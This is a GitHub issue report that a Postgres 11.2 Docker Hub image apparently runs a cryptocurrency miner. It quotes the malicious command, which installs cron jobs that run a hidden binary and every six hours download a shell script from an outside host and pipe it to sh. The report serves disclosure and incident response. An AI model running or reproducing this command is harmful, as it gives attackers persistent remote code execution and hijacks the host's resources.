Skip to content

Compromised image in docker-hub #664

@efagerberg

Description

@efagerberg

Postgres 11.2 AMD64 image seems to be compromised and should be immediately removed from dockerhub. This image executes a cron job to mine cryptocurrencies, and possibly more. Might be worth auditing all variants in case.

cmd: echo "*/30 * * * * /var/lib/postgresql/data/./oka" > /tmp/a;echo "* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh">> /tmp/a; crontab /tmp/a;rm -rf /tmp/a

We noticed on our host machine that there was process running a suspicious script ./oka. This processes was coming from a 2 day old postgres:11.2 docker container once we looked inside the container. We had to nuke the image and fs mounts, so nothing is left over, and rerunning locally I am not able to immediately see the same effect, could be the script only runs after a certain amount of time.

Metadata

Metadata

Assignees

No one assigned

    Labels

    questionUsability question, not directly related to an error with the image

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions